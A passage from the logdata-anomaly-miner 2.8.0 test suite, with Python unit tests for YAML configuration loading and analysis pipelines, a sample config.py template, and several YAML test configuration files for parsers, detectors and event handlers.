\{'oneof " r"definition [0-9]+': \[\{'learn_mode': \['unknown field'], 'reset_after_report_flag': \['unknown field'], 'type': \{'" r"allowed': \['ParserCount']}}]}]}], 'EventHandlers': \[\{1: \['none or more than one rule validate', \{'oneof definition " r"[0-9]+': \[\{'output_file_path': \['unknown field'], 'type': \{'allowed': \['SyslogWriterEventHandler']}}]}]}], 'Parser':" r" \[\{0: \['none or more than one rule validate', \{'oneof definition [0-9]+': \[\{'args2': \['unknown field'], 'type': \{" r"'forbidden': \['ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', '" r"DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement'," r" 'JsonStringModelElement']}}]}]}]}") self.assertIsNotNone(reg.match(str(e))) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/filter_config_errors.yml') def test27_same_id_analysis(self): """Check if a ValueError is raised when the same id is used for multiple analysis components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_analysis.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"NewMatchPathValueComboDetector\" occurred multiple times in Analysis!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test28_same_id_event_handlers(self): """Check if a ValueError is raised when the same id is used for multiple event handler components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_event_handlers.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"handler\" occurred multiple times in EventHandlers!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test29_same_id_parser(self): """Check if a ValueError is raised when the same id is used for multiple parser components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_parser.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"apacheModel\" occurred multiple times in Parser!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test30_parser_model_files(self): """Test if parser models from conf-enabled work properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/main.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() pm = context.atomizer_factory.parsing_model self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [""]) self.assertTrue(isinstance(pm, FirstMatchModelElement)) # Sub1 self.assertTrue(isinstance(pm.children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[0].children[0].element_id, "fix1") self.assertTrue(isinstance(pm.children[0].children[1], DecimalIntegerValueModelElement)) self.assertEqual(pm.children[0].children[1].element_id, "decimal1") # Sub2 self.assertTrue(isinstance(pm.children[1], SequenceModelElement)) self.assertTrue(isinstance(pm.children[1].children[0], DecimalIntegerValueModelElement)) self.assertEqual(pm.children[1].children[0].element_id, "decimal2") self.assertTrue(isinstance(pm.children[1].children[1], FixedDataModelElement)) self.assertEqual(pm.children[1].children[1].element_id, "fix2") self.assertTrue(isinstance(pm.children[1].children[2], DecimalFloatValueModelElement)) self.assertEqual(pm.children[1].children[2].element_id, "decimalFloat2") # Sub2 - Sub3 self.assertTrue(isinstance(pm.children[1].children[3], FirstMatchModelElement)) self.assertTrue(isinstance(pm.children[1].children[3].children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[1].children[3].children[0].children[0].element_id, "fix3") self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[1], DecimalFloatValueModelElement)) self.assertEqual(pm.children[1].children[3].children[0].children[1].element_id, "decimalFloat3") self.assertTrue(isinstance(pm.children[1].children[3].children[1], AnyByteDataModelElement)) self.assertEqual(pm.children[1].children[3].children[1].element_id, "any3") # Sub3 self.assertTrue(isinstance(pm.children[2], FirstMatchModelElement)) self.assertTrue(isinstance(pm.children[2].children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[2].children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[2].children[0].children[0].element_id, "fix3") self.assertTrue(isinstance(pm.children[2].children[0].children[1], DecimalFloatValueModelElement)) self.assertEqual(pm.children[2].children[0].children[1].element_id, "decimalFloat3") self.assertTrue(isinstance(pm.children[2].children[1], AnyByteDataModelElement)) self.assertEqual(pm.children[2].children[1].element_id, "any3") # ApacheAccessModel self.assertEqual(pm.children[3].element_id, "accesslog") def test31_granular_log_resource_list(self): """Test if granular configs of the LogResourceList work properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/granular_log_resource_list.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() atomizer = context.atomizer_factory.get_atomizer_for_resource(b"file:///var/log/apache2/access.log") self.assertEqual(atomizer.parsing_model.element_id, "accesslog") self.assertFalse(atomizer.json_format) atomizer = context.atomizer_factory.get_atomizer_for_resource(b"unix:///var/lib/akafka/aminer.sock") self.assertEqual(atomizer.parsing_model.element_id, "model") self.assertTrue(isinstance(atomizer.parsing_model, SequenceModelElement)) self.assertTrue(atomizer.json_format) def test32_log_resource_ignore_list(self): """Test if analysis components can ignore log resources properly.""" class Object(object): pass t = time() a = Object() source_a = Object() setattr(a, "source", source_a) setattr(source_a, "resource_name", b"file:///tmp/syslog_a") b = Object() source_b = Object() setattr(b, "source", source_b) setattr(source_b, "resource_name", b"file:///tmp/syslog_b") fixed_dme_a = FixedDataModelElement('a', b'a') fixed_dme_b = FixedDataModelElement('b', b'b') match_context_a = MatchContext(b'a') match_element_a = fixed_dme_a.get_match_element("", match_context_a) log_atom1 = LogAtom(fixed_dme_a.fixed_data, ParserMatch(match_element_a), t, source_a) match_context_b = MatchContext(b'b') match_element_b = fixed_dme_b.get_match_element("", match_context_b) log_atom2 = LogAtom(fixed_dme_b.fixed_data, ParserMatch(match_element_b), t+1, source_b) nmpd1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, log_resource_ignore_list=["file:///tmp/syslog_b"]) self.analysis_context.register_component(nmpd1, "Detector1") nmpd2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, log_resource_ignore_list=["file:///tmp/syslog_a"]) self.analysis_context.register_component(nmpd2, "Detector2") self.assertTrue(nmpd1.receive_atom(log_atom1)) self.assertFalse(nmpd1.receive_atom(log_atom2)) self.assertFalse(nmpd2.receive_atom(log_atom1)) self.assertTrue(nmpd2.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S') + " New path(s) detected\nNewMatchPathDetector: \"Detector1\" (1 lines)\n /a: a\n['/a']\na\n\n" + datetime.fromtimestamp(t+1).strftime('%Y-%m-%d %H:%M:%S') + " New path(s) detected\nNewMatchPathDetector: \"Detector2\" (1 lines)\n /b: b\n['/b']\nb\n\n") self.reset_output_stream() def run_empty_components_tests(self, context): """Run the empty components tests.""" self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/__init__.py000066400000000000000000000000001500476301700247700ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/config.py000066400000000000000000000170061500476301700245140ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of py in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # py will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'mail@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'mail@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "py Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 # config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct py how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('Date', b'%d.%m.%Y %H:%M:%S'), FixedDataModelElement('UName', b' ubuntu '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HD Repair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('Disk Upgrade', service_children_disk_upgrade), SequenceModelElement('Home Path', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(None) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list=[''], use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/Home Path/Username', '/model/Home Path/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name=None) anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/000077500000000000000000000000001500476301700251615ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/Sub1.yml000066400000000000000000000005761500476301700265260ustar00rootroot00000000000000Parser: - id: 'fix1' type: FixedDataModelElement name: 'fix1' args: 'fixed1string' - id: 'decimal1' type: DecimalIntegerValueModelElement name: 'decimal1' - id: 'seq1' type: SequenceModelElement start: True name: 'seq1' args: - fix1 - decimal1 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/Sub2.yml000066400000000000000000000011321500476301700265140ustar00rootroot00000000000000Parser: - id: 'decimal2' type: DecimalIntegerValueModelElement name: 'decimal2' - id: 'fix2' type: FixedDataModelElement name: 'fix2' args: 'fixed2string' - id: 'decimalFloat2' type: DecimalFloatValueModelElement name: 'decimalFloat2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'seq2' type: SequenceModelElement start: True name: 'seq2' args: - decimal2 - fix2 - decimalFloat2 - sub3 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/Sub3.yml000066400000000000000000000011541500476301700265210ustar00rootroot00000000000000Parser: - id: 'fix3' type: FixedDataModelElement name: 'fix3' args: 'fixed3string' - id: 'decimalFloat3' type: DecimalFloatValueModelElement name: 'decimalFloat3' - id: 'seq3' type: SequenceModelElement name: 'seq3' args: - fix3 - decimalFloat3 - id: 'any3' type: AnyByteDataModelElement name: 'any3' - id: 'first3' type: FirstMatchModelElement start: True name: 'first3' args: - seq3 - any3 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_error.yml000066400000000000000000000010771500476301700332620ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector min_num_vals: 100 max_num_vals: 99 learn_mode: False logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_valid.yml000066400000000000000000000013301500476301700332200ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector1 min_num_vals: 100 max_num_vals: 200 learn_mode: False - type: EventTypeDetector id: EventTypeDetector2 min_num_vals: 100 max_num_vals: 100 learn_mode: False logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/double_parserstart_config.yml000066400000000000000000000026001500476301700331330ustar00rootroot00000000000000AminerUser: 'aminer' AminerGroup: 'aminer' LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' start: True type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/filter_config_errors.yml000066400000000000000000000027241500476301700321170ustar00rootroot00000000000000AminerUser: 'aminer' AMinerGroup: 'aminer' # this attribute does not exist LogResourceList: - 'file:///var/log/apache2/access.log' RemoteControlSocket: '/var/run/aminer-remote.socket' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' args2: 'apache2' # this attribute does not exist - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False timestamp_paths: "/model/accesslog/time" Analysis: - type: ParserCount id: ParserCount paths: ["/model/accesslog/status"] report_interval: 10 reset_after_report_flag: False # this attribute does not exist learn_mode: True # this attribute does not exist - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector1 paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' output_logline: False allow_missing_values: False EventHandlers: - id: stpe type: StreamPrinterEventHandler output_file_path: '/tmp/streamPrinter.txt' - id: syslog type: SyslogWriterEventHandler output_file_path: '/tmp/streamPrinter.txt' # this attribute does not exist logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/granular_log_resource_list.yml000066400000000000000000000011441500476301700333220ustar00rootroot00000000000000LogResourceList: - url: "file:///var/log/apache2/access.log" - url: "unix:///var/lib/akafka/aminer.sock" json: True parser_id: kafka_audit_logs Parser: - id: kafka_audit_logs type: AuditdParsingModel name: 'kafka' - id: ApacheAccessModel type: ApacheAccessModel name: 'ApacheAccessModel' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - ApacheAccessModel Input: timestamp_paths: "/accesslog/time" json_format: False EventHandlers: - id: stpe json: True type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/invalid_config.yml000066400000000000000000000034051500476301700306610ustar00rootroot00000000000000"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/invalid_schema.yml000066400000000000000000000026711500476301700306600ustar00rootroot00000000000000# This schema is invalid, because of the Some_Weird_Option key. Some_Weird_Option: "test" AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/json_config.yml000066400000000000000000000012001500476301700301730ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/learnMode_config.yml000066400000000000000000000016751500476301700311500ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/main.yml000066400000000000000000000012451500476301700266320ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'sub1' type: Sub1 name: 'sub1' - id: 'sub2' type: Sub2 name: 'sub2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'apacheModel' type: ApacheAccessModel name: 'apache' - id: 'START' start: True type: FirstMatchModelElement name: 'model' args: - sub1 - sub2 - sub3 - apacheModel Input: timestamp_paths: [""] EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/missing_parserstart_config.yml000066400000000000000000000026121500476301700333350ustar00rootroot00000000000000AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/multiSource_config.yml000066400000000000000000000017521500476301700315510ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: multi_source: True # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/multiple_components.yml000066400000000000000000000173201500476301700320070ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: 